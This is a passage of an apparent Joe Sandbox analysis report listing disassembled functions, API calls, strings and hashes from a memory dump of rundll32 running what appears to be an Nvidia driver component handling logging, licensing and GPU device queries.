Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: ErrorLast$DeleteDirectoryFileInit_thread_footerRemove
String ID: boost::filesystem::remove
API String ID: 755209694-3435932043
Opcode ID: b64bcb777294a3ce97eee687f9109f358c09142d434cbb4407fc3cf7f26453ea
Instruction ID: c83cb54c19b0a32e076031819b108459c87ada89367e806e3ebd5ba40eee865c
Opcode Fuzzy Hash: b64bcb777294a3ce97eee687f9109f358c09142d434cbb4407fc3cf7f26453ea
Instruction Fuzzy Hash: AE319762F1C24241FF6C5B6998A8A7D2391AF057C5FE444B2E93DC27DEDE2CE9848244

Function 00007FFDFA997BC0 Relevance: 10.8, APIs: 7, Instructions: 291COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFDFA997FF6

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 97eb496b0259332ccbf06650da3e600a72a57dd18df6424fcd24ae45b35f2a6b
Instruction ID: a4f645dfad1f83c8c79683829809eb2930a15f50a58b074d5f5a64eb839c850a
Opcode Fuzzy Hash: 97eb496b0259332ccbf06650da3e600a72a57dd18df6424fcd24ae45b35f2a6b
Instruction Fuzzy Hash: 9FC10622B0C68661EB685B149020ABD77A0FB89BC8FD401B1DA6E877DDDE7CE855C710

Function 00007FFDFA8B7CB4 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 200COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA8B7E9E
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00007FFDFA8B7FAD

Strings

Nvidia::Logging::Logger::Logger, xrefs: 00007FFDFA8B7DF2, 00007FFDFA8B7E01
c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\Logger.h, xrefs: 00007FFDFA8B7DC6, 00007FFDFA8B7DD5
system, xrefs: 00007FFDFA8B7E27, 00007FFDFA8B7E36
could not convert calendar time to local time, xrefs: 00007FFDFA8B7E93

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Ios_base_dtorstd::invalid_argument::invalid_argumentstd::ios_base::_
String ID: Nvidia::Logging::Logger::Logger$c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\Logger.h$could not convert calendar time to local time$system
API String ID: 3568783628-2048051025
Opcode ID: 5b125194a3b6fbd640f5732ddd7af8216da403e2aec9da76d1aaa13bfb246306
Instruction ID: 467b133b37728663b9f5ddd1f810792e26f282e6301ec0af97518bc9f01b0dc1
Opcode Fuzzy Hash: 5b125194a3b6fbd640f5732ddd7af8216da403e2aec9da76d1aaa13bfb246306
Instruction Fuzzy Hash: 57916C32B25B8299EB14DF20E8609ED33A8FB44B84F801172EA5D57BE9DF78D545C380

Function 00007FFDFA8DFBA0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 195COMMON

Download Yara Rule

APIs

WTSEnumerateSessionsW.WTSAPI32 ref: 00007FFDFA8DFD0B
WTSFreeMemory.WTSAPI32 ref: 00007FFDFA8DFD55

Part of subcall function 00007FFDFA8DE228: _Init_thread_footer.LIBCMT ref: 00007FFDFA8DE2EB

Part of subcall function 00007FFDFA8DF90C: lstrcatW.KERNEL32 ref: 00007FFDFA8DF96C
Part of subcall function 00007FFDFA8DF90C: SHDeleteValueW.SHLWAPI ref: 00007FFDFA8DF984
Part of subcall function 00007FFDFA8DF90C: SHDeleteValueW.SHLWAPI ref: 00007FFDFA8DFA8A

Strings

NvXDCore.cpp, xrefs: 00007FFDFA8DFC3D, 00007FFDFA8DFC4C, 00007FFDFA8DFD93, 00007FFDFA8DFDA2
ReturnLicenseOnSessionLogoff, xrefs: 00007FFDFA8DFC6A, 00007FFDFA8DFC79, 00007FFDFA8DFDC0, 00007FFDFA8DFDCF
License to be returned on session logoff: , xrefs: 00007FFDFA8DFC92
Releasing lease during session logff : , xrefs: 00007FFDFA8DFDE8

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: DeleteValue$EnumerateFreeInit_thread_footerMemorySessionslstrcat
String ID: License to be returned on session logoff: $NvXDCore.cpp$Releasing lease during session logff : $ReturnLicenseOnSessionLogoff
API String ID: 3566551686-1588682423
Opcode ID: 89394ad219414ea1eda7d1833e9640e5cda7d38ad91ebd8383589c79d5e3b979
Instruction ID: 689149754b57d63c4dd9b8036251765c64852a25f36d58abc9ec4c58a8ed640f
Opcode Fuzzy Hash: 89394ad219414ea1eda7d1833e9640e5cda7d38ad91ebd8383589c79d5e3b979
Instruction Fuzzy Hash: FF918A32B05B429AEB14CF60E4605EC33B5FB48748B805276DA5D67BADDF38D519C380

Function 00007FFDFA8AEA34 Relevance: 10.6, APIs: 7, Instructions: 124libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 00007FFDFA8AEA86
LoadLibraryExW.KERNEL32 ref: 00007FFDFA8AEAA2
FindResourceW.KERNEL32 ref: 00007FFDFA8AEACA
LoadResource.KERNEL32 ref: 00007FFDFA8AEAE8
SizeofResource.KERNEL32 ref: 00007FFDFA8AEB01

Part of subcall function 00007FFDFA8AE158: GetLastError.KERNEL32 ref: 00007FFDFA8AE15C

FreeLibrary.KERNEL32 ref: 00007FFDFA8AEBCB

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: LibraryLoadResource$ErrorFindFreeLastSizeof
String ID:
API String ID: 1885110938-0
Opcode ID: 5aa32985baf624cca8e7ff9a0fdc72fa29bc6c7aff20572481ecca569b5f52a8
Instruction ID: e6b14c944af50a8f990b305f725727b5c5f8e04cbc85d31cfdb2777db544d0a0
Opcode Fuzzy Hash: 5aa32985baf624cca8e7ff9a0fdc72fa29bc6c7aff20572481ecca569b5f52a8
Instruction Fuzzy Hash: 35411A22B1CB5292EB18AB15A460A3A63D0FF84790F500675DBBE477ECDF7CD4428710

Function 00007FFDFA8AD5C8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

SetupDiGetDeviceInstanceIdW.SETUPAPI ref: 00007FFDFA8AD625
GetLastError.KERNEL32 ref: 00007FFDFA8AD62F
SetupDiGetDeviceRegistryPropertyW.SETUPAPI ref: 00007FFDFA8AD691
GetLastError.KERNEL32 ref: 00007FFDFA8AD69B

Strings

NDERP_GPU_NAME, xrefs: 00007FFDFA8AD6A6, 00007FFDFA8AD725
NDERP_DEVID, xrefs: 00007FFDFA8AD63D, 00007FFDFA8AD6E7

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: DeviceErrorLastSetup$InstancePropertyRegistry
String ID: NDERP_DEVID$NDERP_GPU_NAME
API String ID: 4016996502-1684991087
Opcode ID: 20b4a7309c67f980bbb4f060b32018a69ad543cceacf0f865983a424358aa3ea
Instruction ID: 55f161104ea53973222d45e3af8adfa8855249f0c9a14004f8226a3194e87858
Opcode Fuzzy Hash: 20b4a7309c67f980bbb4f060b32018a69ad543cceacf0f865983a424358aa3ea
Instruction Fuzzy Hash: 91419326B1868291EB58DB15B464AEA6361FF84B80FC40071DEAD87BDDDF3CD106C710

Function 00007FFDFA8C05D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FFDFA8C0629
std::_Deallocate.LIBCONCRT ref: 00007FFDFA8C06CE
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8C070B

Part of subcall function 00007FFDFA94B7C4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA94B7CD
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B7DE
Part of subcall function 00007FFDFA94B7C4: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFDFA94B7F0
Part of subcall function 00007FFDFA94B7C4: _CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA94B801

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFA8C0711

Strings

gfffffff, xrefs: 00007FFDFA8C0667

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Concurrency::cancel_current_taskExceptionThrow$Deallocatestd::_std::bad_alloc::bad_allocstd::invalid_argument::invalid_argument
String ID: gfffffff
API String ID: 2759354802-1523873471
Opcode ID: 33a5a720a1e49f0f2ea993fd62d9d95539a66f9c150fe8d550d443559b1fb177
Instruction ID: f1cd32d3f0f41e20d7cb1b84f284a520df2b9005e094a5ec73beb3024c80368e
Opcode Fuzzy Hash: 33a5a720a1e49f0f2ea993fd62d9d95539a66f9c150fe8d550d443559b1fb177
Instruction Fuzzy Hash: 9B310772B1474685EF18DF16F46096A6660AB48BD0F088532DFAD8B7C9DF7CE1018742

Function 00007FFDFA8AC4CC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 94librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFDFA8AC53A
LocalAlloc.KERNEL32 ref: 00007FFDFA8AC5AB
GetLastError.KERNEL32 ref: 00007FFDFA8AC5BC

Part of subcall function 00007FFDFA8AAB70: VerSetConditionMask.KERNEL32 ref: 00007FFDFA8AABB0
Part of subcall function 00007FFDFA8AAB70: VerifyVersionInfoW.KERNEL32 ref: 00007FFDFA8AABDE

LocalFree.KERNEL32 ref: 00007FFDFA8AC5FA

Strings

Advapi32.dll, xrefs: 00007FFDFA8AC508
RegQueryValueExW, xrefs: 00007FFDFA8AC530

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Local$AddressAllocConditionErrorFreeInfoLastMaskProcVerifyVersion
String ID: Advapi32.dll$RegQueryValueExW
API String ID: 3707099831-295176829
Opcode ID: 3b1918feed5cdcf811039015ee0c203f6dbd9f2afb8276c003aca7cd37809b0a
Instruction ID: 02b3d9b82f91085a6b8fa3c1c08c37d13f5adff54f86af42cc8966e28914c3ff
Opcode Fuzzy Hash: 3b1918feed5cdcf811039015ee0c203f6dbd9f2afb8276c003aca7cd37809b0a
Instruction Fuzzy Hash: 80418276B29B0382EB58CB41E860A3973A0BF48B85F484075EA5D47798EF7CE841C754

Function 00007FFDFA8C4D74 Relevance: 10.6, APIs: 7, Instructions: 85COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FFDFA8C4D94
std::_Lockit::_Lockit.LIBCPMT ref: 00007FFDFA8C4DB9
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFDFA8C4DE3
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA8C4E52
_CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA8C4E63
std::_Facet_Register.LIBCPMT ref: 00007FFDFA8C4E8D
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFDFA8C4E98

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowstd::bad_alloc::bad_alloc
String ID:
API String ID: 4235596951-0
Opcode ID: 87e29b836b6ce1882bb84a9302c8754bbd976dc5ec82b295c8913eb34a78b172
Instruction ID: f077130025f19000d6c8e0f5f218ee7ad3cb1774ea2bf96c4ffd45988f0131bd
Opcode Fuzzy Hash: 87e29b836b6ce1882bb84a9302c8754bbd976dc5ec82b295c8913eb34a78b172
Instruction Fuzzy Hash: 8031B621B1DA0281EB19AB15E5648B92370EF847E8F5A0272DA7D436EDCF6CE4468700

Function 00007FFDFA8C5270 Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FFDFA8C5290
std::_Lockit::_Lockit.LIBCPMT ref: 00007FFDFA8C52B5
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFDFA8C52DF
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA8C534E
_CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA8C535F
std::_Facet_Register.LIBCPMT ref: 00007FFDFA8C5389
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFDFA8C5394

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowstd::bad_alloc::bad_alloc
String ID:
API String ID: 4235596951-0
Opcode ID: 05062f5de901b6319e6d83e78444265483c925cbf75637d10a1c2ce7220c0a38
Instruction ID: f1d42158df6337d4ea2e3cdb80f78336e939f3bda346efa3dc86edbff6f4be82
Opcode Fuzzy Hash: 05062f5de901b6319e6d83e78444265483c925cbf75637d10a1c2ce7220c0a38
Instruction Fuzzy Hash: 0631CA21B5CA0285EF1C9B25E8608B96365EF847E4F5902B2DA7D43BEDDF7CE4468700

Function 00007FFDFA8CF408 Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FFDFA8CF428
std::_Lockit::_Lockit.LIBCPMT ref: 00007FFDFA8CF44D
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFDFA8CF477
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA8CF4E6
_CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA8CF4F7
std::_Facet_Register.LIBCPMT ref: 00007FFDFA8CF521
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFDFA8CF52C

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowstd::bad_alloc::bad_alloc
String ID:
API String ID: 4235596951-0
Opcode ID: 65fc179b0b8e600c6ef115aceee9b11afc16383d53d3bfb2b7c46a8b37ebccd2
Instruction ID: a4cc80a4ad41e843dbf6b03d3aa4fa1ec74cfb536848037263bcd0afff0fccbd
Opcode Fuzzy Hash: 65fc179b0b8e600c6ef115aceee9b11afc16383d53d3bfb2b7c46a8b37ebccd2
Instruction Fuzzy Hash: 29318422B19A0281FB189B15E5608796371FB847E8F5942B2DA7D43BEDCF2CE946C700

Function 00007FFDFA8EC064 Relevance: 10.6, APIs: 7, Instructions: 85COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FFDFA8EC084
std::_Lockit::_Lockit.LIBCPMT ref: 00007FFDFA8EC0A9
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFDFA8EC0D3
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA8EC142
_CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA8EC153
std::_Facet_Register.LIBCPMT ref: 00007FFDFA8EC17D
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFDFA8EC188

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowstd::bad_alloc::bad_alloc
String ID:
API String ID: 4235596951-0
Opcode ID: 7eb5e4a6ca8ce825ba952445e2a4b9a6f56faeb6e933f4681ab783b92e0ea07b
Instruction ID: f154f3e44afc1a8345f93a0d42482bc2162c87cb52b4cf1896d8d6687fd0aaff
Opcode Fuzzy Hash: 7eb5e4a6ca8ce825ba952445e2a4b9a6f56faeb6e933f4681ab783b92e0ea07b
Instruction Fuzzy Hash: 3931B962F0DA42C1EB1C9B26D4608B96361EF847E4F5942B1DA7D43BEDCF6CE9468340

Function 00007FFDFA8CF700 Relevance: 10.6, APIs: 7, Instructions: 85COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FFDFA8CF720
std::_Lockit::_Lockit.LIBCPMT ref: 00007FFDFA8CF745
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFDFA8CF76F
